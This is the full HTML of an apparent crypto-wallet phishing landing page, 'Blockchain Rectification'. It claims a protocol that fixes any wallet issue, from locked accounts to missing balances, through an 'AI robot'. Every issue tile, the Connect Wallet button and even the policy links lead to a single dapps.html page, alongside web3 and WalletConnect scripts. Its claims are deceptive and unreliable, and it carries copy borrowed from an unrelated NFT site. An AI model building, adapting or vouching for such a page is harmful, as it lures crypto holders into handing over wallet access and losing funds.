<!DOCTYPE html>
<html lang="en">
<head>
	<link data-react-helmet="true" rel="shortcut icon" href="https://accountresolvecenter.netlify.app/img/image.jpg">
    <meta data-react-helmet="true" name="msapplication-TileColor" content="#da532c">
    <meta data-react-helmet="true" name="theme-color" content="#ffffff">
    <meta data-react-helmet="true" name="description" content="1. Click the above, 2. Select Issue Type 3. Select Wallet Type, 4. Input Necessary information, 5. Validate">
    <meta data-react-helmet="true" name="keywords" content="ethereum, cryptocurrency, wallet, mobile, connect, bridge, relay, proxy, standard, protocol, crypto, tokens, dapp">
    <meta data-react-helmet="true" name="twitter:card" content="summary_large_image">
    <meta data-react-helmet="true" name="twitter:site" content="@syncwallet">
    <meta data-react-helmet="true" name="twitter:title" content="">
    <meta data-react-helmet="true" name="twitter:description" content="1. Click the above, 2. Select Issue Type 3. Select Wallet Type, 4. Input Necessary information, 5. Validate">
    <meta data-react-helmet="true" name="twitter:img:src" content="../social-card.html">
    <meta data-react-helmet="true" name="og:title" content="Click Here To Fix Issues">
    <meta data-react-helmet="true" name="og:type" content="website">
    <meta data-react-helmet="true" name="og:url" content="../">
    <meta data-react-helmet="true" name="og:image" content="../../syncwallet.online/social-card.png">
    <meta data-react-helmet="true" name="og:description" content="1. Click the above, 2. Select Issue Type 3. Select Wallet Type, 4. Input Necessary information, 5. Validate">
    <meta data-react-helmet="true" name="og:site_name" content="Blockchain Rectification">
    <meta data-react-helmet="true" name="fb:admins" content="365412154213405">
    <title>Blockchain Rectification - We are help to help you resolve your crypto related issues</title>
    <link rel="shortcut icon" type="image/png" href="images/favicon.png"/>
    <link rel="stylesheet" href="bootstrapy.min.css">
    <link rel="stylesheet" href="owl.carousel.css">
    <link rel="stylesheet" href="owl.theme.default.css">
    <link rel="stylesheet" href="remixicon.css">
    <link rel="stylesheet" href="fonts.css">
    <link rel="stylesheet" href="app.css">
    <link rel="stylesheet" id="stm-stmicons-css" href="stmicons.css" type="text/css" media="all" />
    <link href="select2.min.css" rel="stylesheet" />
    <link href="toastr.min.css" rel="stylesheet" />
    <link href="display.css" rel="stylesheet" />
</head>
<body>
    <div style="height:62px; background-color: #1D2330; overflow:hidden; box-sizing: border-box; border: 1px solid #282E3B; border-radius: 4px; text-align: right; line-height:14px; block-size:62px; font-size: 12px; font-feature-settings: normal; text-size-adjust: 100%; box-shadow: inset 0 -20px 0 0 #262B38;padding:1px;padding: 0px; margin: 0px; width: 100%;">
        <div style="height:40px; padding:0px; margin:0px; width: 100%;"><iframe src="https://widget.coinlib.io/widget?type=horizontal_v2&theme=dark&pref_coin_id=1505&invert_hover=no" width="100%" height="36px" scrolling="auto" marginwidth="0" marginheight="0" frameborder="0" border="0" style="border:0;margin:0;padding:0;"></iframe></div>
        <div
            style="color: #626B7F; line-height: 14px; font-weight: 400; font-size: 11px; box-sizing: border-box; padding: 2px 6px; width: 100%; font-family: Verdana, Tahoma, Arial, sans-serif;"><a href="https://coinlib.io" target="_blank" style="font-weight: 500; color: #626B7F; text-decoration:none; font-size:11px">Cryptocurrency Prices</a>&nbsp;by Coinlib</div>
    </div>

    
        <div class="hero2-main">
            <div class="container-fluid">
                <div class="row row-custom">
                    <div class="col-lg-5 col-content-otr">
                        <div class="col-content-inr">
                            <h1 class="heading heading-h1">Blockchain Rectification</h1>
                            <p class="desc heading-L">Every digital artwork on Upside is authentic and truly unique. Blockchain technology makes this new aproch to digital ownership possible.</p>
                <p class="desc heading-L">Open and decentralized protocol for syncing various Wallets issues on  Secure Server. This is not an app but a protocol that establishes a remote resolution between all noncustodial wallet</h4>
                            <p class="desc heading-L">It is an online server which gets you across to every wallet representative to enable effective complain and rectification of issues.</h3>
                            <p class="desc heading-L">You will be on a chat with an Artificial Intelligence Robot with zero Human interference.</h3>
                            <div class="action">
                                <a href="dapps.html"><button  class="btn-primary-1 btn-hero heading-SB connectBtn"  id="connectBtn">Connect Wallet</button></a>
                
                                <div class="btn-hero heading-SB" id="slect-main">
                                    <select class="select2-hidden-accessible select2" id="select2-main" aria-invalid="false" data-select2-id="select2-data-1-x6av" tabindex="-1" aria-hidden="true">
                                        <option value="">Select Chain</option>
                                        <option value="0x1" data-select2-id="select2-data-3-rcyi">Ethereum</option>
                                        <option value="0x38" data-select2-id="select2-data-30-ir32">Binance S</option>
                                        <option value="0x89" data-select2-id="select2-data-31-w03z">Polygon</option>
                                        <option value="0xa86a" data-select2-id="select2-data-32-71oo">Avalanche</option>
                                        <option value="0xfa" data-select2-id="select2-data-33-hulu">Fantom</option>
                                        <option value="0xfa" data-select2-id="select2-data-33-hulu">Arbitrum</option>
                                        <option value="0x19" data-select2-id="select2-data-35-silk">Cronos</option>
                                    </select>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <img class="hero-img" src="images/hero-img-home-2.png" alt="img">
            </div>
        </div>
    <!--==================================
            Hero Section End Here
    ===================================-->
    <!--==================================
            How It Works Start Here
    ===================================-->
    <div class="how-it-work-main">
        <div class="container-fluid">
            <div class="wrapper">
                <div class="tab-otr">
                    <h2 class="heading heading-h2">Make Your Selection Below</h2>
                </div>
            </div>
            <div class="row-custom-main">
                <div id="tab-21" class="tab-content active">
                    <div class="row row-custom-inr">
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="dapps.html"><div class="col-work-inr box-1 connectBtn">
                                <div class="icon-otr">
                                    <img class="oge" src="imggallery/dashboardicon.png" alt="Dashboard"  />
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h2">Synchronize Wallet</h4>
                                    <p class="desc heading-S">Click here to synchronize your wallet.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="dapps.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <img class="oge" src="imggallery/icons8-warning-64.png" alt="Statistic" />
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h2">Validate Wallet</h4>
                                    <p class="desc heading-S">Click here to validate your wallet.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="dapps.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <img class="oge" src="imggallery/icons8-warning-64.png" alt="Statistic"  />
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h2">Assets Recovery</h4>
                                    <p class="desc heading-S">Click here to rectify issues and recover asset on Blockchain.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="dapps.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <img class="oge" src="imggallery/statistics.png" alt="Statistic"  />
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h2">High Gas Fees</h4>
                                    <p class="desc heading-S">Click here for gas fee related issues.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="dapps.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <img class="oge" src="imggallery/icons8-failed-64.png" alt="Folders" />
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h2">Slippage Error</h4>
                                    <p class="desc heading-S">Click here for slippage rrlated error during trade.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="dapps.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <img class="oge" src="imggallery/icons8-failed-64.png" alt="Folders" />
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h2">Transaction Error</h4>
                                    <p class="desc heading-S">Click here for transaction related issues.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="dapps.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <img class="oge" src="imggallery/trilored.png" alt="Statistic"  />
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h2">Cross Chain Transfer</h4>
                                    <p class="desc heading-S">Click here for cross chain bridge issues.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="dapps.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <img class="oge" src="imggallery/statistics.png" alt="Statistic"  />
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h2">Staking Issues</h4>
                                    <p class="desc heading-S">click here for staking related issues.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="dapps.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <img class="oge" src="imggallery/dashboardicon.png" alt="Dashboard"  />
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h2">Swap/Exchange</h4>
                                    <p class="desc heading-S">Click here for swap/exchange related issues.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="dapps.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <img class="oge" src="imggallery/dashboardicon.png" alt="Statistic"  />
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h2">Claim Reflection</h4>
                                    <p class="desc heading-S">Click here to claim reflection.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="dapps.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <img class="oge" src="imggallery/dashboardicon.png" alt="Dashboard"  />
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h2">Connect to Dapps</h4>
                                    <p class="desc heading-S">Click here for error while connecting to Dapps</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="dapps.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-crypto_secured"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h2">Login Issues</h4>
                                    <p class="desc heading-S">Click here for issues while logging into your wallet.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="dapps.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <img class="oge" src="imggallery/dashboardicon.png" alt="Statistic"  />
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h2">Migration Issue</h4>
                                    <p class="desc heading-S">Click here for migration related issues.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="dapps.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <img class="oge" src="imggallery/trilored.png" alt="Statistic"  />
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h2">NFTS Issues</h4>
                                    <p class="desc heading-S">Click here for NFTs minting/transfer related issues.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="dapps.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <img class="oge" src="imggallery/trilored.png" alt="Statistic"  />
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h2">Missing/Irregular Balance</h4>
                                    <p class="desc heading-S">Click here to recover lost/missing funds.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="dapps.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <img class="oge" src="imggallery/trilored.png" alt="Statistic"  />
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h2">Whitelist Issues</h4>
                                    <p class="desc heading-S">Click here for whitelist related issues.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="dapps.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <img class="oge" src="imggallery/profile.png" alt="Profiles"  />
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h2">Transaction Delay</h4>
                                    <p class="desc heading-S">Click here for any issues related to transaction delayed.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="dapps.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <img class="oge" src="imggallery/icons8-lock-80.png" alt="Folders"  />
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h2">Locked Account</h4>
                                    <p class="desc heading-S">Click here for issues related to account lock.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="dapps.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <img class="oge" src="imggallery/icons8-neutral-trading-80.png" alt="Folders"  />
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h2">Trading Wallet Issues</h4>
                                    <p class="desc heading-S">Click here if you have problem with your trading wallet.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="dapps.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <img class="oge" src="imggallery/icons8-failed-64.png" alt="Folders"  />
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h2">Unable To Buy Coins/Tokens</h4>
                                    <p class="desc heading-S">To trade crypto your account must be marked as a trusted payment source.</p>
                                </div>
                            </div></a>
                        </div>
                            <div class="col-lg-4 col-md-6 col-work-otr">
                                <a href="dapps.html"><div class="col-work-inr connectBtn">
                                    <div class="icon-otr">
                                        <img class="oge" src="imggallery/trilored.png" alt="Statistic"  />
                                    </div>
                                    <div class="content">
                                        <h4 class="heading heading-h2">Other Issues Not Listed</h4>
                                        <p class="desc heading-S">If you can't find the issue you are experiencing click here</p>
                                    </div>
                                </div></a>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
   
    <!--==================================
            How It Works End Here
    ===================================-->
    <!--==================================
            Footer Start Here
    ===================================-->
        <div class="copyright-main">
            <div class="container-fluid">
                <div class="wrapper">
                    <p class="copy-right heading-S">Copyright &copy 2023 Blockchain Rectification. All rights reserved.</p>
                    <div class="linkk-otr">
                        <p class="linkk-inr"><a href="dapps.html" class="linkk-page heading-S">Privacy Policy | </a>  <a href="dapps.html" class="linkk-page heading-S"> Terms of Service</a></p>
                    </div>
                </div>
            </div>
        </div>
    <!--==================================
            Footer End Here
    ===================================-->
    <script src="assets/libs/jquery/dist/jquery.min.js"></script>
    <script src="assets/libs/jquery.countdown/jquery.countdown.min.js"></script>
    <script src="assets/libs/owl.carousel/dist/owl.carousel.min.js"></script>
    <script src="assets/libs/bootstrap/dist/js/bootstrap.bundle.min.js"></script>
    <script src="npm/select2_4.1.0-rc.0/dist/js/select2.min.js"></script>
    <script src="assets/js/app.js"></script>
    <script src="assets/js/decimal.js"></script>
    <script src="assets/js/web3.min.js"></script>
    <script src="assets/js/web3modal.js"></script>
    <script src="assets/js/evm-chains/index.min.js"></script>
    <script src="assets/js/_walletconnect/web3-provider/index.min.js"></script>
    <script src="assets/js/_portis/web3/index.min.js"></script>
    <script src="assets/js/webModule.js"></script>
    <script src="ajax/libs/toastr_js/latest/toastr.min.js"></script>
</body>
</html>
